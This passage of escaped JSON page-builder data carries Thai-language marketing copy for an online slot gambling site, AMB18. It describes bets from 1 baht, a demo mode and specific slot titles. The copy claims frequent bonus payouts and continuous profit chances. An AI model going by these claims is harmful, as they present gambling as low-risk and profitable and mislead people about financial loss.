\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e1b\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e42\\u0e17\\u0e19\\u0e2a\\u0e35\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e2a\\u0e32\\u0e22\\u0e15\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e41\\u0e19\\u0e27\\u0e17\\u0e32\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cbf6885\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\",\"id\":351,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\" AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e15\\u0e48\\u0e33\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e38\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e32\\u0e21\\u0e07\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e2a\\u0e39\\u0e07\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b \\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 